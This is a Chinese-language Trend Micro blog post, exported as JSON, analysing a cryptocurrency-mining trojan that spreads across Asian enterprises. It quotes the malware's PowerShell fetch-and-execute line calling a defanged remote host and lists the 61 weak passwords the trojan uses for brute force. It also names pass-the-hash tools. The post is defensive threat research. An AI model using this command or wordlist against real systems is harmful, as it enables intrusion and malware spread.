{"id":60232,"date":"2019-04-16T09:00:47","date_gmt":"2019-04-16T01:00:47","guid":{"rendered":"https:\/\/blog.trendmicro.com.tw\/?p=60232"},"modified":"2019-04-16T14:35:26","modified_gmt":"2019-04-16T06:35:26","slug":"%e9%82%84%e5%9c%a8%e4%bd%bf%e7%94%a8%e8%80%81%e8%88%8a%e8%bb%9f%e9%ab%94%e5%92%8c%e9%80%99-61-%e7%b5%84%e5%bc%b1%e5%af%86%e7%a2%bc-%e6%8c%96%e7%a4%a6%e7%97%85%e6%af%92%e5%88%a9%e7%94%a8%e5%a4%9a","status":"publish","type":"post","link":"https:\/\/blog.trendmicro.com.tw\/?p=60232","title":{"rendered":"\u9084\u5728\u4f7f\u7528\u8001\u820a\u8edf\u9ad4\u548c\u9019 61 \u7d44\u5f31\u5bc6\u78bc? \u6316\u7926\u75c5\u6bd2\u5229\u7528\u591a\u91cd\u653b\u64ca\u624b\u6cd5\u81ea\u4e2d\u570b\u64f4\u6563\u81f3\u53f0\u7063\u3001\u65e5\u672c\u7b49\u4e9e\u6d32\u4f01\u696d"},"content":{"rendered":"\n

\u8da8\u52e2\u79d1\u6280<\/a>\u5075\u6e2c\u5230\u4e00\u500b\u60e1\u610f\u8edf\u9ad4: Trojan.PS1.LUDICROUZ.A\u7528\u591a\u7a2e\u611f\u67d3\u65b9\u5f0f,\u64f4\u6563\u9580\u7f85\u5e63\u6316\u7926\u7a0b\u5f0f\u5230\u66f4\u591a\u7684\u7cfb\u7d71\u548c\u4f3a\u670d\u5668\u3002\u8a72\u6316\u7926\u75c5\u6bd2\u5728\u4eca\u5e74\u521d\u73fe\u8eab<\/a>\u4e2d\u570b\uff0c\u539f\u5148\u7684\u611f\u67d3\u65b9\u5f0f\u662f\u7528\u5f31\u5bc6\u78bc\u53capass-the-hash\uff08\u50b3\u905e\u96dc\u6e4a\uff09\u6280\u8853,\u9084\u6709\u7d93\u7531Windows\u7ba1\u7406\u5de5\u5177\u8207\u516c\u958b\u539f\u59cb\u78bc\u9032\u884c\u66b4\u529b\u7834\u89e3\u653b\u64ca\uff0c \u3002\u5728\u65e5\u672c\u767c\u73fe\u7684\u9019\u8d77\u65b0\u6848\u4f8b\u6703\u7528EternalBlue(\u6c38\u6046\u4e4b\u85cd)<\/a> \u6f0f\u6d1e\u653b\u64ca\u53caPowerShell\u4f86\u5165\u4fb5\u7cfb\u7d71\u4e26\u8eb2\u907f\u5075\u6e2c\u3002<\/p>\n\n\n\n

\"\u6316\u7926\u75c5\u6bd2\u5229\u7528\u591a\u91cd\u653b\u64ca\u624b\u6cd5\u81ea\u4e2d\u570b\u64f4\u6563\u81f3\u53f0\u7063\u3001\u65e5\u672c\u7b49\u4e9e\u6d32\u4f01\u696d\"<\/figure>\n\n\n\n

\u770b\u8d77\u4f86\u653b\u64ca\u8005\u6b63\u5728\u5c07\u6b64\u6bad\u5c4d\u7db2\u8def\u64f4\u5c55\u5230\u5176\u4ed6\u570b\u5bb6\uff1b\u8da8\u52e2\u79d1\u6280\u767c\u73fe\u5728\u53f0\u7063\u3001\u65e5\u672c\u3001\u9999\u6e2f\u3001\u8d8a\u5357\u3001\u5370\u5ea6\u53ca\u6fb3\u6d32\u90fd\u767c\u73fe\u4e86\u6b64\u5a01\u8105\u3002<\/p>\n\n\n\n

\u8da8\u52e2\u79d1\u6280<\/a>\u767c\u73fe\u9019\u500b\u60e1\u610f\u8edf\u9ad4\u975e\u5e38\u8907\u96dc\uff0c\u5c08\u9580\u8a2d\u8a08\u6210\u611f\u67d3\u66f4\u591a\u7684\u96fb\u8166\uff0c\u800c\u4e14\u53ef\u4ee5\u4e0d\u6703\u99ac\u4e0a\u88ab\u5075\u6e2c\u5230\u3002\u5b83\u6703\u5229\u7528\u96fb\u8166\u7cfb\u7d71\u548c\u8cc7\u6599\u5eab\u7684\u5f31\u5bc6\u78bc\uff0c\u91dd\u5c0d\u4f01\u696d\u53ef\u80fd\u4ecd\u5728\u4f7f\u7528\u7684\u8001\u820a\u8edf\u9ad4\uff0c\u4f7f\u7528\u6703\u5728\u8a18\u61b6\u9ad4\u5167\u4e0b\u8f09\u548c\u57f7\u884c\u7d44\u4ef6\u7684PowerShell\u8173\u672c\uff0c\u653b\u64ca\u672a\u4fee\u88dc\u7684\u6f0f\u6d1e\u4ee5\u53ca\u4f7f\u7528Windows\u7684\u555f\u52d5\u8cc7\u6599\u593e\u548c\u4efb\u52d9\u6392\u7a0b\u9032\u884c\u5b89\u88dd\u3002<\/p>\n\n\n\n

\u9451\u65bcPowerShell\u7684\u65e5\u6f38\u666e\u53ca\u52a0\u4e0a\u6709\u8d8a\u4f86\u8d8a\u591a\u516c\u958b\u53ef\u7528\u7684\u958b\u653e\u7a0b\u5f0f\u78bc\uff0c\u53ef\u4ee5\u9810\u671f\u6703\u770b\u5230\u66f4\u52a0\u8907\u96dc\u7684\u60e1\u610f\u8edf\u9ad4\u3002\u96d6\u7136\u6536\u96c6\u7cfb\u7d71\u8cc7\u8a0a\u4e26\u9001\u56deC&C\u8207\u76f4\u63a5\u7aca\u53d6\u500b\u4eba\u8eab\u4efd\u8cc7\u6599\u76f8\u6bd4\u53ef\u80fd\u986f\u5f97\u5fae\u4e0d\u8db3\u9053\uff0c\u4f46\u7cfb\u7d71\u8cc7\u8a0a\u5c0d\u6a5f\u5668\u4f86\u8aaa\u662f\u7368\u4e00\u7121\u4e8c\u7684\uff0c\u53ef\u4ee5\u7528\u4f86\u8ffd\u8e64\u8b58\u5225\u4f7f\u7528\u8005\u53ca\u5176\u6d3b\u52d5\u3002<\/p>\n\n\n\n

\u547c\u7c72\u4f01\u696d\u5118\u65e9\u66f4\u65b0\u7cfb\u7d71, \u4f7f\u7528\u8907\u96dc\u5bc6\u78bc, \u4e26\u61c9\u7528\u53ef\u4ee5\u5f9e\u9598\u9053\u5230\u7aef\u9ede\u4e3b\u52d5\u5c01\u9396\u9019\u4e9b\u5a01\u8105\u548c\u60e1\u610f\u7db2\u5740\u7684\u591a\u5c64\u6b21\u4fdd\u8b77\u7cfb\u7d71\u3002 <\/p>\n\n\n\n

\u4e3b\u8981\u6563\u64ad\u65b9\u5f0f\u662f\u5229\u7528\u5f31\u5bc6\u78bc\u767b\u5165\u9023\u63a5\u7db2\u8def\u7684\u5176\u4ed6\u96fb\u8166<\/em><\/strong><\/h3>\n\n\n\n

\u9019\u500b\u60e1\u610f\u8edf\u9ad4\uff08\u8da8\u52e2\u79d1\u6280\u5075\u6e2c\u70baTrojan.PS1.LUDICROUZ.A\uff09\u7684\u4e3b\u8981\u6563\u64ad\u65b9\u5f0f\u662f\u5229\u7528\u5f31\u5bc6\u78bc\u767b\u5165\u9023\u63a5\u7db2\u8def\u7684\u5176\u4ed6\u96fb\u8166\u3002\u5b83\u4e0d\u6703\u76f4\u63a5\u5c07\u81ea\u5df1\u8907\u88fd\u5230\u9023\u63a5\u7684\u7cfb\u7d71\uff0c\u800c\u662f\u900f\u904e\u9060\u7aef\u547d\u4ee4\u4f86\u8b8a\u66f4\u4e2d\u6bd2\u96fb\u8166\u7684\u9632\u706b\u7246\u548c\u7aef\u53e3\u8f49\u767c\u8a2d\u5b9a\uff0c\u5efa\u7acb\u6392\u7a0b\u4f86\u4e0b\u8f09\u4e26\u57f7\u884c\u66f4\u65b0\u7684\u60e1\u610f\u8edf\u9ad4\u3002\u4e0b\u8f09\u7684PowerShell\u8173\u672c\u6703\u57f7\u884c\uff1a<\/p>\n\n\n\n\n\n\n\n

IEX\n(New-Object Net.WebClient).downloadstring(\u2018hxxp:\/\/v.beahh[.]com\/wm?hp\u2019)<\/em><\/p>\n\n\n\n
\n 123456\n password\n PASSWORD\n football\n welcome\n 1\n 12\n 21\n 123\n 321\n 1234\n 12345\n 123123\n 123321\n 111111\n 654321\n 666666\n 121212\n 000000\n 222222\n 888888\n <\/td>\n 1111\n 555555\n 1234567\n 12345678\n 123456789\n 987654321\n admin\n abc123\n abcd1234\n abcd@1234\n abc@123\n p@ssword\n P@ssword\n p@ssw0rd\n P@ssw0rd\n P@SSWORD\n P@SSW0RD\n P@$$w0rd\n P@$$word\n P@$$w0rd\n iloveyou\n <\/td>\n monkey\n login\n passw0rd\n master\n hello\n qazwsx\n password1\n qwerty\n baseball\n qwertyuiop\n superman\n 1qaz2wsx\n fuckyou\n 123qwe\n zxcvbn\n pass\n aaaaaa\n love\n administrator\n <\/td><\/tr><\/tbody><\/table>\n\n\n\n

\u88681 <\/em>\u4e3b\u8981\u6563\u64ad\u7528\u7684\u5f31\u5bc6\u78bc\u3002<\/em><\/p>\n\n\n\n

\u5b83\u9084\u6703\u5c07\u6b64\u5217\u8868\u8207Invoke-WMIMethod<\/em>\uff08\u8da8\u52e2\u79d1\u6280\u5075\u6e2c\u70baHackTool.Win32.Impacket.AI\uff09\u4e00\u8d77\u4f7f\u7528\uff0c\u4f86\u53d6\u5f97\u5c0d\u5176\u4ed6\u96fb\u8166\u7684\u9060\u7aef\u5b58\u53d6\u80fd\u529b\uff1a<\/p>\n\n\n\n

\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_4-invoke-wmimethod.png\"\/<\/figure>\n\n\n\n

\u57161. Invoke-WMIMethod<\/em>\u7528\u4f86\u9060\u7aef\u5b58\u53d6\u4f7f\u7528\u5f31\u5bc6\u78bc\u7684\u96fb\u8166\u3002<\/em><\/p>\n\n\n\n

\u60e1\u610f\u8edf\u9ad4\u9084\u6703\u7528pass-the-hash<\/a>\u7684\u65b9\u5f0f\uff0c\u5229\u7528\u4f7f\u7528\u8005\u7684\u5bc6\u78bc\u96dc\u6e4a\u4f86\u53d6\u5f97\u9060\u7aef\u4f3a\u670d\u5668\u8a8d\u8b49\u3002\u60e1\u610f\u8edf\u9ad4\u5229\u7528Get-PassHashes<\/a>\u547d\u4ee4\u4f86\u53d6\u5f97\u5132\u5b58\u5728\u96fb\u8166\u5167\u7684\u96dc\u6e4a\u503c\uff0c\u518d\u52a0\u4e0a\u4e86\u6240\u5217\u51fa\u5f31\u5bc6\u78bc\u7684\u96dc\u6e4a\u503c\u3002\u6709\u4e86\u9019\u4e9b\u96dc\u6e4a\u503c\u5f8c\uff0c\u60e1\u610f\u8edf\u9ad4\u5229\u7528Invoke-SMBClient<\/a>\uff08\u53e6\u4e00\u500b\u516c\u958b\u8173\u672c\uff09\u900f\u904epass-the-hash\u9032\u884c\u6a94\u6848\u5171\u4eab\u64cd\u4f5c\u3002<\/p>\n\n\n\n

\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_5-get-passhashes.png\"\/<\/figure>\n\n\n\n
\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/files\/2019\/04\/crypto-spreader-multiple-lateral-methods_17-weak-pwords.png\"\/<\/figure>\n\n\n\n

\u57162. <\/em>\u60e1\u610f\u8edf\u9ad4\u5229\u7528pass-the-hash<\/em>\u6280\u8853\u53d6\u5f97\u4f7f\u7528\u8005\u5bc6\u78bc\u96dc\u6e4a\u503c\u53ca\u5f31\u5bc6\u78bc\u96dc\u6e4a\u503c\u3002<\/em><\/p>\n\n\n\n

\u6210\u529f\u4e4b\u5f8c\uff0c\u5b83\u6703\u522a\u9664\u6a94\u6848%Start Menu%\\Programs\\Startup\\run.bat<\/em>\uff0c\u9019\u53ef\u80fd\u662f\u820a\u7248\u672c\u7684\u60e1\u610f\u8edf\u9ad4\u3002\u5b83\u9084\u6703\u522a\u9664\u4ee5\u4e0b\u5167\u5bb9\uff1a<\/p>\n\n\n\n